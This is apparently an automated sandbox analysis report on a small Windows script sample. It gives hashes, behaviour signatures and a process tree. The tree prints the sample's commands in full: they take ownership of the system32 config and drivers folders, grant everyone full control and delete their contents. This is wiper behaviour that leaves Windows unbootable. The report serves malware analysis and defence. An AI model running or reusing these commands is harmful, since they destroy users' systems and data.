Analysis

  • max time kernel
    139s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15-08-2024 21:31

General

  • Target

    file.wsf

  • Size

    2KB

  • MD5

    b39eb8682deec9c7a7edcb64512655b0

  • SHA1

    d412384d9cfd8ec2333146eb1dd6c137543dabc7

  • SHA256

    9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27

  • SHA512

    539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:440
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4260
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2168
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1448
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4840

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\thescript.vbs

    Filesize

    2KB

    MD5

    b39eb8682deec9c7a7edcb64512655b0

    SHA1

    d412384d9cfd8ec2333146eb1dd6c137543dabc7

    SHA256

    9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27

    SHA512

    539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

  • C:\Users\Admin\Desktop\CheckpointWait.vbs

    Filesize

    98B

    MD5

    4b91264568ac2162700be36338c095e8

    SHA1

    c95726edf8303e6adabcb12ffdca90b51349990a

    SHA256

    2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037

    SHA512

    e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b